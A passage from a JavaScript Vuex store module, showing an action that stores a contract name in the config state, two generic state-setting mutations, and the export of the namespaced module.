        commit("SET_ITEM", ["config", "contractName", possibleContractName]);
    },
};
const mutations = {
    SET(state, [key, value]) {
        state[key] = value;
    },
    SET_ITEM(state, [key, item, value]) {
        state[key][item] = value;
    },
};

export default {
    namespaced: true,
    state,
    getters,
    actions,
    mutations,
};
